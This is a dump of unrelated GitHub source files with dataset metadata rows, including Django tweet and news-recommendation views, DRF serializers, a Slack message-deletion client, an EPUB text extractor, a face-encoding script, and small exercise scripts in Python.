    """Return the 3 news items most similar to *item_id* per the doc2vec model."""
    similar_items = model.docvecs.most_similar(positive=[item_id], topn=3)
    items = []
    for item_id, score in similar_items:
        df_item = df[df.category == item_id]  # NOTE(review): category doubles as the item id
        title = df_item.iloc[0].title
        content = df_item.iloc[0].content
        category = df_item.iloc[0].category
        link = df_item.iloc[0].link
        # photo_link support disabled; see get_news_content for the intended
        # NaN handling if it is restored.
        score = round(score, 2)
        item = {
            "category": category,
            "title": title,
            "link": link,
            "id": item_id,
            'score': score,
        }
        items.append(item)
    return items
print("app_doc2vec was loaded!") | guan-jie-chen/Term_Project-Django | app_news_rcmd/views.py | views.py | py | 5,726 | python | en | code | 1 | github-code | 13 |
31006642800 | from django.contrib.auth.models import User, Group
from rest_framework import serializers
from api.models import *
from . import customer_serializer
class ProductTypeSerializer(serializers.HyperlinkedModelSerializer):
    """Serializes a ProductType, exposing only its id and title."""
    class Meta:
        model = producttype_model.ProductType
        fields = ('id', 'title',)
class ProductSerializer(serializers.HyperlinkedModelSerializer):
    """Serializes a Product with a nested, read-only (restricted) customer."""
    customer = customer_serializer.RestrictedCustomerSerializer(read_only=True)
    class Meta:
        model = product_model.Product
        fields = ('id', 'url', 'customer', 'title', 'description', 'price', 'quantity')
        depth = 1
| samphillips1879/bangazon-python-api | api/serializers/product_serializer.py | product_serializer.py | py | 624 | python | en | code | 0 | github-code | 13 |
42757552721 |
import re
# Interactive script: validate a Panamanian cedula and a name against a
# blocklist file, appending an audit line to .vscode\Cedula.txt on success.
print("Bienvenido a la cedulacion! Porfavor introduzca su cedula.")
cedula = input("Coloca su cedula: ")
# BUG FIX: '[1-13]{1}' is a character class (it matches a single '1', '2' or
# '3'), not the province range 1-13, and '([PE]|[N]|[E])' matches one letter so
# 'PE-...' cedulas could never match.  Also use fullmatch so partial/trailing
# garbage is rejected, and require at least one digit per group.
patron1 = r'(1[0-3]|[1-9])\-[0-9]{1,3}\-[0-9]{1,4}'
patron2 = r'(PE|N|E)\-[0-9]{1,3}\-[0-9]{1,4}'
ruta2 = '.vscode\\Cedula.txt'
if re.fullmatch(patron1, cedula) or re.fullmatch(patron2, cedula):
    print("La cedula " + cedula + " es valida y ha sido guardada en el registro.")
    # 'with' guarantees the file is closed even if the write fails
    with open(ruta2, 'a') as archivo_cedula:
        archivo_cedula.write("Una Cedula ha sido guardada \n")
else:
    print("la cedula " + cedula + " es invalid, por favor intente denuevo")
print("Ingrese su nombre.")
ruta = '.vscode\\nombres.txt'
nombre = (input("Introduzca el nombre: "))
# BUG FIX: 'nombre in archivo' compared against raw file lines that still end
# in '\n', so no name ever matched; strip each line first.
with open(ruta, 'r') as archivo_nombres:
    nombres_prohibidos = {linea.strip() for linea in archivo_nombres}
if nombre in nombres_prohibidos:
    print(" El nombre esta dentro de la lista prohibida de nombres, por favor intentelo denuevo")
else:
    print("el nombre: " + nombre + " es valido")
    with open(ruta2, 'a') as archivo_cedula:
        archivo_cedula.write("Un nombre ha sido guardada \n")
24346426262 | # # This Program takes Training images from the directory and encode them using face_encoding function from face_recognition and save the encoded images as "train.pkl"
import face_recognition
import cv2
import os
import pickle # Create portable serialized representations of Python objects
print(cv2.__version__)
Encodings=[]
Names=[]
image_dir='/home/rajavel/Desktop/PyProg/FaceRecognizer/demoImages/known' # Training image folder
for root, dirs, files in os.walk(image_dir): # os.walk - Directory tree generator. For each directory in the directory tree rooted at top, yields a 3-tuple - dirpath, dirnames, filenames
print(files)
for file in files:
path=os.path.join(root,file) #Join two or more pathname with file, inserting '/' as needed.
print(path)
name=os.path.splitext(file)[0] # os.path.splitext() method in Python, used to split the path name into a pair root and ext. ext stands for extension of the specified path while root is everything except ext part
print(name)
person=face_recognition.load_image_file(path) # Load the Training images from the specified path
encoding=face_recognition.face_encodings(person)[0] # Encode the person using face_encoding function in face_recognition module
Encodings.append(encoding) # Append the encodings of all the person with Name
Names.append(name)
print(Names)
# Open a file named "train.pkl" with handle "f" for writing bytes (wb) and dump the Encodings and Names
with open('train.pkl','wb') as f:
pickle.dump(Names,f)
pickle.dump(Encodings,f)
| Vishvambar-Panth/Jetson-Nano-Exercise | FaceRecognizer/trainSave.py | trainSave.py | py | 1,582 | python | en | code | 0 | github-code | 13 |
43690461056 | ##Given three integers x,y and z you need to find the
##sum of all the numbers formed by having 4 atmost x
##times , having 5 atmost y times and having 6 atmost
##z times as a digit.
def sumcalc(x, y, z):
    """Sum all distinct numbers writable with digit 4 at most x times,
    digit 5 at most y times and digit 6 at most z times.

    Returns -1 if any count is negative.
    """
    if min(x, y, z) < 0:
        return -1
    import itertools
    total = 0
    for n4 in range(x + 1):
        for n5 in range(y + 1):
            for n6 in range(z + 1):
                digits = '4' * n4 + '5' * n5 + '6' * n6
                if not digits:
                    continue  # no digits -> no number to add
                # set() removes duplicate permutations of repeated digits
                total += sum({int(''.join(p)) for p in itertools.permutations(digits)})
    return total
| Mythili895/python-coding | leetcode/given_permutation sum.py | given_permutation sum.py | py | 523 | python | en | code | 0 | github-code | 13 |
73720230096 | import numpy as np
import matplotlib.pyplot as plt
from plot_stencil import plot_stencil
plt.figure()
# 30x30 field with fixed boundary values: +1 on the top/left edges, -1 on the
# bottom/right edges, 0 at the two mixed corners.
data = np.zeros((30, 30))
data[0, :] = 1
data[:, 0] = 1
data[29, :] = -1
data[:, 29] = -1
data[0,29] = 0
data[29,0] = 0
# Second field: same boundary, but interior initialized with a linear ramp
# from +1 (top-left) to -1 (bottom-right) as a better initial guess.
data2 = data.copy()
for i in range(1,29):
    for j in range(1, 29):
        data2[i,j] = (i+j) / 60 * (-2) + 1
iter_per_frame = 10
# plt.pause(5)
# Side-by-side animation comparing convergence from the trivial vs guessed start.
fig, ((ax1, ax2)) = plt.subplots(nrows=1, ncols=2)
plot_stencil(data, ax1, "Boundary Condition")
plot_stencil(data, ax2, "Boundary Condition")
plt.pause(4)
plot_stencil(data, ax1, "Trivial Initial Value")
plot_stencil(data2, ax2, "Guessed Initial Value")
plt.pause(2)
for frame in range(50):
    data_old = data.copy()
    data2_old = data2.copy()
    for _ in range(iter_per_frame):
        # Damped in-place relaxation sweep: 1/8 weight on each of the four
        # neighbors plus 1/2 on the cell itself (already-updated neighbors are
        # reused within the same sweep).
        for i in range(1, 29):
            for j in range(1, 29):
                data[i,j] = 0.125*(data[i-1,j] + data[i+1,j] + data[i,j-1] + data[i,j+1]) + 0.5 * data[i,j]
                data2[i,j] = 0.125*(data2[i-1,j] + data2[i+1,j] + data2[i,j-1] + data2[i,j+1]) + 0.5 * data2[i,j]
    # Residual = largest absolute change over the last iter_per_frame sweeps.
    residual = np.abs(np.subtract(data_old, data)).max().max()
    residual2 = np.abs(np.subtract(data2_old, data2)).max().max()
    title1 = "#Iteration : %d \n residual %f" %(frame * iter_per_frame, residual)
    title2 = "#Iteration : %d \n residual %f" %(frame * iter_per_frame, residual2)
    plot_stencil(data, ax1, title1)
    plot_stencil(data2, ax2, title2)
    plt.pause(0.1)
plt.pause(5)
30140632270 | import sys
import requests
from web_wrapper.web import Web
import logging
logger = logging.getLogger(__name__)
class DriverRequests(Web):
    """Web driver backed by a ``requests.Session``.

    Default headers/cookies/proxy (``current_headers`` etc.) are attributes
    provided by the ``Web`` base class -- TODO confirm against web_wrapper.web.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.driver_type = 'requests'
        self._create_session()

    # Headers Set/Get
    def get_headers(self):
        """Return the session's current headers."""
        return self.driver.headers

    def set_headers(self, headers):
        """Replace all session headers with *headers*."""
        self.driver.headers = headers

    def update_headers(self, headers):
        """Merge *headers* into the session headers."""
        self.driver.headers.update(headers)

    # Cookies Set/Get
    def get_cookies(self):
        """Return the session cookies as a plain dict."""
        return self.driver.cookies.get_dict()

    def _clean_cookies(self, cookies):
        """Normalize cookies to a list of single-entry ``{name: value}`` dicts.

        Accepts a single dict or a list of dicts, either Selenium-style
        (``{'name': ..., 'value': ...}``) or already ``{name: value}``.
        """
        clean_cookies = []
        if isinstance(cookies, dict) is True:
            cookies = [cookies]
        for cookie in cookies:
            if 'name' in cookie and 'value' in cookie:
                clean_cookies.append({cookie['name']: cookie['value']})
            else:
                name = list(cookie.keys())[0]
                clean_cookies.append({name: cookie[name]})
        return clean_cookies

    def set_cookies(self, cookies):
        """Replace the session cookies with *cookies*."""
        # BUG FIX: `self.driver.cookies = self._clean_cookies(cookies)` replaced
        # the RequestsCookieJar with a plain list, breaking get_cookies()
        # (.get_dict()) and cookie merging on later requests.  Empty the jar
        # and merge the cleaned cookies instead, keeping the jar type intact.
        self.driver.cookies.clear()
        for cookie in self._clean_cookies(cookies):
            self.driver.cookies.update(cookie)

    def update_cookies(self, cookies):
        """Merge *cookies* into the session cookie jar."""
        for cookie in self._clean_cookies(cookies):
            self.driver.cookies.update(cookie)

    # Proxy Set/Get
    def set_proxy(self, proxy):
        """
        Set proxy for requests session (same proxy for http and https);
        ``None`` disables the proxy.
        """
        # TODO: Validate proxy url format
        if proxy is None:
            self.driver.proxies = {'http': None,
                                   'https': None
                                   }
        else:
            self.driver.proxies = {'http': proxy,
                                   'https': proxy
                                   }
        self.current_proxy = proxy

    def get_proxy(self):
        """Return the proxy url currently in use (or None)."""
        return self.current_proxy

    # Session
    def _create_session(self):
        """
        Creates a fresh session and applies the stored default headers,
        cookies and proxy.
        """
        self.driver = requests.Session(**self.driver_args)
        # Set default headers
        self.update_headers(self.current_headers)
        self.update_cookies(self.current_cookies)
        self.set_proxy(self.current_proxy)

    def reset(self):
        """
        Kills old session and creates a new one with the default headers
        """
        self.driver = None
        self._create_session()

    def quit(self):
        """
        Generic function to close and destroy session data
        """
        self.driver = None

    # Actions
    def _get_site(self, url, headers, cookies, timeout, driver_args, driver_kwargs):
        """
        Fetch *url* and return the body text; raises on HTTP error status.

        Headers and cookies passed here are merged over the session's own,
        overriding duplicate keys for this request only.
        """
        try:
            response = self.driver.get(url,
                                       *driver_args,
                                       headers=headers,
                                       cookies=cookies,
                                       timeout=timeout,
                                       **driver_kwargs)
            # Expose response details for the calling script
            self.status_code = response.status_code
            self.url = response.url
            self.response = response
            response.raise_for_status()
            return response.text
        except Exception as e:
            raise e.with_traceback(sys.exc_info()[2])
| xtream1101/web-wrapper | web_wrapper/driver_requests.py | driver_requests.py | py | 3,626 | python | en | code | 0 | github-code | 13 |
34768874302 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 12 15:35:11 2023
This is a program to calculate earning compound interest
P = Principal amount(initial investment)
r = annual nominal interst rate (as a decimal)
n = number of times the interest is compounded per year
t = number of years
A = final mount
@author: ruyonga
"""
from sys import exit
# Interactive compound-interest calculator: A = P * (1 + r/n)^(n*t)
p = input("How much do you want to invest?\n")
if p.isdigit():
    p = float(p)
    print("principal is: ", p)
else:
    print("Invalid principal amount entered, restart the program")
    exit()
r = input("At what annual rate? ex. 10 NOT 10% \n")
if r.isdigit():
    r = float(r)/100
    print("Interest is: ", r)
else:
    print("Invalid entry entered, please enter number")
    # BUG FIX: previously execution fell through with r still a string and
    # crashed later; abort like the principal branch does.
    exit()
t = input("For how many years would you like to invest? \n")
if t.isdigit():
    t = int(t)
    print("investing period: ", t)
else:
    print("Invalid value entered, please enter number")
    exit()  # BUG FIX: abort on invalid input (see above)
n = input("Enter the number of compounding per year? \n")
if n.isdigit():
    n = int(n)
    print("Compounding period: ", n)
else:
    print("Invalid value entered, please enter number")
    exit()  # BUG FIX: abort on invalid input (see above)
print("principal", p, "interest", r, "period", t, "number of times", n)
#BODMAS
compounding = n * t
print("compounding nt:", compounding)
rate = r / n
print("calculated rate r/n:", rate)
step_1 = (1 + rate)
print("step (1 + rate)", step_1)
step_2 = pow(step_1, compounding)
print("step 2 step_2 ^ nt", step_2)
final_amount = p * step_2
# BUG FIX: the summary printed `n` (compoundings per year); the investment
# duration is `t` years.
print("You will have", str(round(final_amount, 2)), "after", t, "years")
| ruyonga/py101 | homework.py | homework.py | py | 1,554 | python | en | code | 0 | github-code | 13 |
26818987991 | from typing import List
import ebooklib
from bs4 import BeautifulSoup
from ebooklib import epub
def __epub_to_html(epub_path: str) -> list:
    """
    Reads and output contents of a specified EPUB file in HTML form

    :param epub_path: The full path to the input file
    :return: a new list of raw HTML payloads, one per document item
    """
    book = epub.read_epub(epub_path)
    htmls = []
    for item in book.get_items():
        # keep only document (content) items; skip images, styles, etc.
        if item.get_type() == ebooklib.ITEM_DOCUMENT:
            htmls.append(item.get_content())
    return htmls
def __html_to_txt(htmls) -> list:
    """
    Given a list of HTML elements encoding a EPUB file text content, extract those text contents and return them in a
    list

    :param htmls: The provided HTML elements
    :return: a new list of plain-text strings (newlines flattened to spaces)
    """
    txt = []
    for html in htmls:
        # strip markup, then flatten newlines into spaces for one-line text
        txt.append(BeautifulSoup(html, 'html.parser').get_text().replace('\n', ' '))
    return txt
def epub_to_txt(epub_path: str) -> List[str]:
    """
    Reads and output contents of a specified EPUB file in a list.

    Composes the two private helpers: extract HTML items, then strip markup.

    :param epub_path: The full path to the input file
    :return: a new list
    """
    return __html_to_txt(__epub_to_html(epub_path))
if __name__ == "__main__":
pass
| QubitPi/peitho-data | peitho_data/datafication/epub.py | epub.py | py | 1,195 | python | en | code | 0 | github-code | 13 |
21586228021 | """
Valid Palindrome
----------------
Given a string, determine if it is a palindrome, considering only alphanumeric
characters and ignoring cases.
Note:
For the purpose of this problem, we define empty string as
valid palindrome.
Example 1:
- Input: "A man, a plan, a canal: Panama"
- Output: true
Example 2:
- Input: "race a car"
- Output: false
Reference:
- https://algorithm.yuanbin.me/zh-hans/string/valid_palindrome.html
- https://leetcode.com/problems/valid-palindrome/
- https://www.lintcode.com/problem/valid-palindrome/
"""
import unittest
def is_palindrome(s):
    """
    Determine whether or not given string is valid palindrome, considering
    only alphanumeric characters and ignoring cases.

    :param s: given string
    :type s: str
    :return: whether or not given string is valid palindrome
    :rtype: bool
    """
    # Keep only the alphanumeric characters, case-folded to lower.
    # An empty result (including the empty string) is a valid palindrome.
    filtered = [ch.lower() for ch in s if ch.isalnum()]
    # A palindrome reads the same forwards and backwards.
    return filtered == filtered[::-1]
class TestValidPalindrome(unittest.TestCase):
    """Unit tests covering empty input, mixed case, punctuation and negatives."""
    def test_valid_palindrome(self):
        self.assertTrue(is_palindrome(''))
        self.assertFalse(is_palindrome('0P'))
        self.assertTrue(is_palindrome('a'))
        self.assertTrue(is_palindrome('A man, a plan, a canal: Panama'))
        self.assertFalse(is_palindrome('race a car'))
if __name__ == '__main__':
unittest.main()
| corenel/lintcode | algorithms/415_valid_palindrome.py | 415_valid_palindrome.py | py | 1,745 | python | en | code | 1 | github-code | 13 |
3745351590 | from django.conf import settings
from django.http import JsonResponse
from django.shortcuts import render, redirect
from rest_framework.decorators import api_view, permission_classes
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated
from rest_framework.pagination import PageNumberPagination
from .forms import TweetForm
from .models import Tweet
from .serializers import TweetSerializer, TweetActionSerializer, TweetCreateSerializer
@api_view(['POST'])
@permission_classes([IsAuthenticated])
def tweet_create_view(request, *args, **kwargs):
    """Create a tweet from the request payload, owned by the requesting user."""
    serializer = TweetCreateSerializer(data=request.data)
    # raise_exception=True makes DRF return a 400 automatically on bad input
    if serializer.is_valid(raise_exception=True):
        serializer.save(user=request.user)
    return Response(serializer.data, status=201)
def get_paginator_response(qs, request):
    """Serialize *qs* in pages of 20 tweets and return the paginated response."""
    paginator = PageNumberPagination()
    paginator.page_size = 20
    paginator_qs = paginator.paginate_queryset(qs, request)
    serializer = TweetSerializer(paginator_qs, many=True)
    return paginator.get_paginated_response(serializer.data)
@api_view(["GET"])
@permission_classes([IsAuthenticated])
def tweet_feed_view(request, *args, **kwargs):
    """Return the paginated personal feed of the requesting user."""
    user = request.user
    qs = Tweet.objects.feed(user)
    return get_paginator_response(qs, request)
@api_view(['GET'])
def tweet_list_view(request, *args, **kwargs):
    """List all tweets, optionally filtered by ?username= (case-insensitive)."""
    qs = Tweet.objects.all()
    username = request.GET.get('username')
    if username is not None:
        qs = qs.filter(user__username__iexact=username)
    return get_paginator_response(qs, request)
@api_view(['GET'])
def tweet_detail_view(request, id, *args, **kwargs):
    """Return the serialized tweet with the given id, or 404 if absent."""
    qs = Tweet.objects.filter(id=id)
    if not qs.exists():
        return Response({}, status=404)
    obj = qs.first()
    serializer = TweetSerializer(obj)
    return Response(serializer.data, status=200)
@api_view(['DELETE', 'POST'])
@permission_classes([IsAuthenticated])
def tweet_delete_view(request, id, *args, **kwargs):
    """Delete the tweet with the given id; only its owner may delete it.

    BUG FIX: the IsAuthenticated guard was missing (every sibling mutating
    view has it), so request.user could be AnonymousUser when filtering by
    owner below.
    """
    qs = Tweet.objects.filter(id=id)
    if not qs.exists():
        return Response({}, status=404)
    # restrict to tweets owned by the requesting user
    qs = qs.filter(user=request.user)
    if not qs.exists():
        return Response({"message": "you cannot delete this tweet."}, status=404)
    obj = qs.first()
    obj.delete()
    return Response({"message": "Tweet successfully removed"}, status=200)
@api_view(['POST'])
@permission_classes([IsAuthenticated])
def tweet_action_view(request, *args, **kwargs):
    """
    id is required.
    Action option are like, unlike and re-tweet
    """
    serializer = TweetActionSerializer(data=request.data)
    if serializer.is_valid(raise_exception=True):
        data = serializer.validated_data
        id = data.get("id")
        action = data.get("action")
        content = data.get("content")  # only used for retweet
        qs = Tweet.objects.filter(id=id)
        if not qs.exists():
            return Response({}, status=404)
        obj = qs.first()
        if action == "like":
            obj.likes.add(request.user)
            serializer = TweetSerializer(obj)
            return Response(serializer.data, status=200)
        elif action == "unlike":
            obj.likes.remove(request.user)
            serializer = TweetSerializer(obj)
            return Response(serializer.data, status=200)
        elif action == "retweet":
            # retweet = new tweet pointing at the original via `parent`
            new_tweet = Tweet.objects.create(user=request.user, parent=obj, content=content)
            serializer = TweetSerializer(new_tweet)
            return Response(serializer.data, status=201)
    return Response({}, status=200)
def tweet_create_view_pure_django(request, *args, **kwargs):
    """Legacy (non-DRF) create view: form POST or AJAX, login required."""
    # if user is not authenticated
    if not request.user.is_authenticated:
        if request.is_ajax():
            return JsonResponse({}, status=401)
        return redirect(settings.LOGIN_URL)
    # if user is authenticated
    form = TweetForm(request.POST or None)
    if form.is_valid():
        obj = form.save(commit=False)
        # BUG FIX: was `request.user.is_authenticated or None`, which stored
        # the boolean True instead of the User instance as the tweet's owner.
        obj.user = request.user
        obj.save()
        if request.is_ajax():
            return JsonResponse(obj.serialize(), status=201)
        return redirect("/")
    if form.errors:
        if request.is_ajax():
            return JsonResponse(form.errors, status=400)
    return render(request, "common/form.html", context={"form": form})
def home_view(request, *args, **kwargs):
    # Render the single-page-app shell.
    return render(request, 'pages/home.html')
def tweet_list_view_pure_django(request, *args, **kwargs):
    """Legacy JSON list endpoint: {"response": [serialized tweets]}."""
    qs = Tweet.objects.all()
    tweet_list = [x.serialize() for x in qs]
    data = {
        "response": tweet_list
    }
    return JsonResponse(data)
def tweet_detail_view_pure_django(request, id):
    """Legacy JSON detail endpoint: {"id", "content"} or a not-found message."""
    data = {
        "id": id
    }
    try:
        qs = Tweet.objects.get(pk=id)
        data["content"] = qs.content
    # BUG FIX: bare `except:` swallowed every exception (including
    # KeyboardInterrupt); only a missing tweet should produce the message.
    except Tweet.DoesNotExist:
        data["message"] = "no tweet found"
    return JsonResponse(data)
| umairkhan987/Django-React-Twitter-App | backend-django/twitterApi/tweets/views.py | views.py | py | 4,842 | python | en | code | 0 | github-code | 13 |
73828120656 | #!/usr/bin/python
import sys, time
from slackclient import SlackClient
class MySlackClient:
token = None
sc = None
default_ch = None
    def __init__(self, token, default_ch):
        """Create a Slack API client bound to a default channel id."""
        self.token = token
        self.sc = SlackClient(token)
        self.default_ch = default_ch
    def send_message_log(self, msg):
        # Post *msg* to the default channel via chat.postMessage.
        self.sc.api_call(
            "chat.postMessage",
            channel=self.default_ch,
            text=msg
        )
def del_parties_msgs(self, user_id, parties_except=None):
parties = self.get_parties_list()
for party in parties:
if party['id'] not in parties_except:
messages = self.retrieve_channel_messages(party['id'])
for m in messages:
if m['user'] == user_id:
self.remove_chat_message(user_id=user_id, chat_id=party['id'], ts=m['ts'])
def get_parties_list(self):
formatted_channels = []
parties = self.sc.api_call('mpim.list', exclude_archived=1)
print(parties)
for party in parties['groups']:
new_channel = {
'name': party['name'],
'id': party['id'],
'creator': party['creator']
}
formatted_channels.append(new_channel)
return formatted_channels
def retrieve_channel_messages(self, chat_id=None):
if not chat_id: chat_id=self.default_ch
messages = self.sc.api_call(
'mpim.history',
channel=chat_id,
count=1000
)
return messages['messages']
def del_private_chats_msgs(self, user_id, chats_except=None):
chats = self.get_private_chats_list()
for chat in chats:
print(chat)
if chat['id'] not in chats_except:
messages = self.retrieve_chat_messages(chat['id'])
for m in messages:
if m['user'] == user_id:
print("Removing: " + m['text'])
self.remove_chat_message(user_id=user_id, chat_id=chat['id'], ts=m['ts'])
time.sleep(1)
def retrieve_chat_messages(self, chat_id):
messages = self.sc.api_call(
'im.history',
channel=chat_id,
count=1000
)
return messages['messages']
def get_private_chats_list(self):
chats = self.sc.api_call(
"im.list"
)
formatted_chats = []
for chat in chats['ims']:
if chat['user'] not in ['U0UFSEW80', 'U0UFNRLUQ']:
formatted_chats.append({
'id': chat['id'],
'user': chat['user']
})
return formatted_chats
def get_channels_list(self):
formatted_channels = []
channels = self.sc.api_call('channels.list', exclude_archived=1)
for channel in channels['channels']:
new_channel = {
'name': channel['name'],
'id': channel['id'],
'creator': channel['creator']
}
formatted_channels.append(new_channel)
print(formatted_channels)
return formatted_channels
def remove_chat_message(self, chat_id, user_id, ts):
self.sc.api_call(
'chat.delete',
channel=chat_id,
ts=ts
)
def get_channel_info(self, channel_name):
channels_list = self.get_channels_list()
for channel in channels_list:
if channel['name'] == channel_name: return channel
| danypr92/PySlackBot | my_slack/my_slack_client.py | my_slack_client.py | py | 3,590 | python | en | code | 0 | github-code | 13 |
10326522677 | def isPalindrome(self, head):
if not head or not head.next:
return True
# 1. Get the midpoint (slow)
slow = fast = cur = head
while fast and fast.next:
fast, slow = fast.next.next, slow.next
# 2. Push the second half into the stack
stack = [slow.val]
while slow.next:
slow = slow.next
stack.append(slow.val)
# 3. Comparison
while stack:
if stack.pop() != cur.val:
return False
cur = cur.next
return True
| NikhilNarvekar123/Competitive-Programming | temp/palindromelinkedlist.py | palindromelinkedlist.py | py | 517 | python | en | code | 0 | github-code | 13 |
41506081333 | # -*- coding: UTF-8 -*-
from sqlitedict import SqliteDict
from nonebot import *
import math
import yaml
import json
import os
import re
bot = get_bot()
class Dict(dict):
__setattr__ = dict.__setitem__
__getattr__ = dict.__getitem__
def dict_to_object(dict_obj):
if not isinstance(dict_obj, dict):
return dict_obj
inst = Dict()
for k, v in dict_obj.items():
inst[k] = dict_to_object(v)
return inst
# 获取配置
def get_config():
file = open(os.path.join(os.path.dirname(__file__), "config.yaml"), 'r', encoding="utf-8")
return dict_to_object(yaml.load(file.read(), Loader=yaml.FullLoader))
# 获取字符串中的关键字
def get_msg_keyword(keyword, msg, is_first=False):
msg = msg[0] if isinstance(msg, tuple) else msg
res = re.split(format_reg(keyword, is_first), msg, 1)
res = tuple(res[::-1]) if len(res) == 2 else False
return ''.join(res) if is_first and res else res
# 格式化配置中的正则表达式
def format_reg(keyword, is_first=False):
keyword = keyword if isinstance(keyword, list) else [keyword]
return f"{'|'.join([f'^{i}' for i in keyword] if is_first else keyword)}"
def get_path(*paths):
return os.path.join(os.path.dirname(__file__), *paths)
db = {}
# 初始化数据库
def init_db(db_dir, db_name='db.sqlite') -> SqliteDict:
if db.get(db_name):
return db[db_name]
db[db_name] = SqliteDict(get_path(db_dir, db_name),
encode=json.dumps,
decode=json.loads,
autocommit=True)
return db[db_name]
# 寻找MessageSegment里的某个关键字的位置
def find_ms_str_index(ms, keyword, is_first=False):
for index, item in enumerate(ms):
if item['type'] == 'text' and re.search(format_reg(keyword, is_first), item['data']['text']):
return index
return -1
# 是否是群管理员
def is_group_admin(ctx):
return ctx['sender']['role'] in ['owner', 'admin', 'administrator']
def filter_list(plist, func):
return list(filter(func, plist))
# 获取群内的群友名字
async def get_group_member_name(group_id, user_id):
qq_info = await bot.get_group_member_info(group_id=group_id, user_id=user_id)
return qq_info['card'] or qq_info['nickname']
bossData = {
'scoreRate': [
[1, 1, 1.3, 1.3, 1.5],
[1.4, 1.4, 1.8, 1.8, 2],
[2.0, 2.0, 2.5, 2.5, 3.0]
],
'hp': [6000000, 8000000, 10000000, 12000000, 20000000],
'max1': 4,
'max2': 11
}
def calc_hp(hp_base: int):
zm = 1
king = 1
cc = 0.0
remain = 0.0
damage = 0
remainHp = 0.0
remainPer = 0.0
while True:
if zm < bossData['max1']:
nowZm = 0
elif bossData['max1'] <= zm < bossData['max2']:
nowZm = 1
elif zm >= bossData['max2']:
nowZm = 2
#nowZm = bossData['max1'] - 1 if zm > bossData['max1'] else zm - 1
cc += bossData['scoreRate'][nowZm][king - 1] * bossData['hp'][king - 1]
if cc > hp_base:
cc -= bossData['scoreRate'][nowZm][king - 1] * bossData['hp'][king - 1]
remain = (hp_base - cc) / bossData['scoreRate'][nowZm][king - 1]
damage += remain
remainPer = 1.0 - remain / bossData['hp'][king - 1]
remainHp = bossData['hp'][king - 1] - remain
break
damage += bossData['hp'][king - 1]
if king == 5:
zm += 1
king = 1
continue
king += 1
remainPer *= 100
bdk = bossData['hp'][king - 1]
return f'{zm}周目{king}王 [{math.floor(remainHp)}/{bdk}] {round(remainPer, 2)}%' | sanshanya/hoshino_xcw | XCW/Hoshino/hoshino/modules/eclanrank/util.py | util.py | py | 3,692 | python | en | code | 231 | github-code | 13 |
27159994105 | import tkinter as tk
import json
from tkinter import messagebox
f1 = open("files/proveedorData.json", "r")
c = f1.read()
file = json.loads(c) #js
def formulario_proveedor(app):
codigoP = tk.StringVar()
cuilData = tk.StringVar()
razonSocialData = tk.StringVar()
domicilioData = tk.StringVar()
telefonoData = tk.StringVar()
# VALIDACIÓN DE DATOS
def validate(obj):
count = 0
if(obj["codigo"].isdigit()):
pass
else:
messagebox.showerror("Codigo Invalido", "Debes poner un valor numerico")
count += 1
if(obj["razonSocial"].isalpha()):
pass
else:
messagebox.showerror("Razon Social Invalida", "La razon social no debe contener numeros ni espacios")
count += 1
if(obj["telefono"].isdigit()):
pass
else:
messagebox.showerror("Telefono Invalido", "El telefono debe estar compuesto unicamente por numeros.")
count += 1
if(count > 0):
messagebox.showerror("ERROR", "Hay datos invalidos en el formulario.")
formulario_proveedor.destroy()
else:
f = open("files/proveedorData.json", "w")
file.append(obj)
newFile = json.dumps(file, indent=4, sort_keys=True)
f.write(newFile)
f.close()
formulario_proveedor.destroy()
# FUNCIÓN PARA OBTENER LA INFO. DE LOS CAMPOS Y ALMACENARLA EN EL ARCHIVO
def getInfoProveedor():
nwObjc = {}
nwObjc["codigo"] = codigoP.get()
nwObjc["cuil"] = cuilData.get()
nwObjc["razonSocial"] = razonSocialData.get()
nwObjc["domicilio"] = domicilioData.get()
nwObjc["telefono"] = telefonoData.get()
validate(nwObjc)
# FUNCIÓN PARA CREAR LA VENTANA
formulario_proveedor = tk.Toplevel(app, bg="#030618")
formulario_proveedor.geometry("500x400")
from ButtonClass.ButtonClass import ButtonClass
label_formulario_proveedor = tk.Label(formulario_proveedor, text="Información del Proveedor:", font=('Arial', 18), bg="#030618", fg="#fff")
label_formulario_proveedor.grid(row=0, column=0, columnspan=2, pady=10)
codigo_p = tk.Label(formulario_proveedor, text="Código: ", font=('Arial', 14), bg="#030618", fg="#fff")
codigo_p.grid(row=1, column=0, pady=10, padx=10)
cuil_p = tk.Label(formulario_proveedor, text="CUIL:", font=('Arial', 14), bg="#030618", fg="#fff")
cuil_p.grid(row=2, column=0, pady=10, padx=10)
razon_social = tk.Label(formulario_proveedor, text="Razón social:", font=('Arial', 14), bg="#030618", fg="#fff")
razon_social.grid(row=3, column=0, pady=10, padx=10)
domicilio = tk.Label(formulario_proveedor, text="Domicilio:", font=('Arial', 14), bg="#030618", fg="#fff")
domicilio.grid(row=4, column=0, pady=10, padx=10)
telefono = tk.Label(formulario_proveedor, text="Teléfono:", font=('Arial', 14), bg="#030618", fg="#fff")
telefono.grid(row=5, column=0, pady=10, padx=10)
entry_codigop = tk.Entry(formulario_proveedor, font=('Arial', 14), textvariable=codigoP)
entry_codigop.grid(row=1, column=1)
entry_cuil = tk.Entry(formulario_proveedor, font=('Arial', 14), textvariable=cuilData)
entry_cuil.grid(row=2, column=1)
entry_rs = tk.Entry(formulario_proveedor, font=('Arial', 14), textvariable=razonSocialData)
entry_rs.grid(row=3, column=1)
entry_dom = tk.Entry(formulario_proveedor, font=('Arial', 14), textvariable=domicilioData)
entry_dom.grid(row=4, column=1)
entry_tel = tk.Entry(formulario_proveedor, font=('Arial', 14), textvariable=telefonoData)
entry_tel.grid(row=5, column=1)
boton_hecho = tk.Button(formulario_proveedor, image=ButtonClass.btnConfirmar, bg="#030618", command=getInfoProveedor, highlightthickness = 0, borderwidth=0, activebackground="#041E2D")
boton_hecho.grid(row=6, column=1, pady=10)
boton_volver = tk.Button(formulario_proveedor, image=ButtonClass.btnVolver, bg="#030618", command=formulario_proveedor.destroy, highlightthickness = 0, borderwidth=0, activebackground="#041E2D")
boton_volver.grid(row=6, column=0, pady=10)
| Christian-000/ParcialFinalAyED | forms/formProviders.py | formProviders.py | py | 4,192 | python | es | code | 0 | github-code | 13 |
36549522492 | #扫描py文件,根据匹配规则获取其中的函数以及调用方式
#2020.5.29-修复传参bug,精简代码,加入索引
#鸡贼的获取变量名的字符串https://www.zhihu.com/question/42768955#
# import re
# import traceback
# pattren = re.compile(r'[\W+\w+]*?get_variable_name\((\w+)\)')
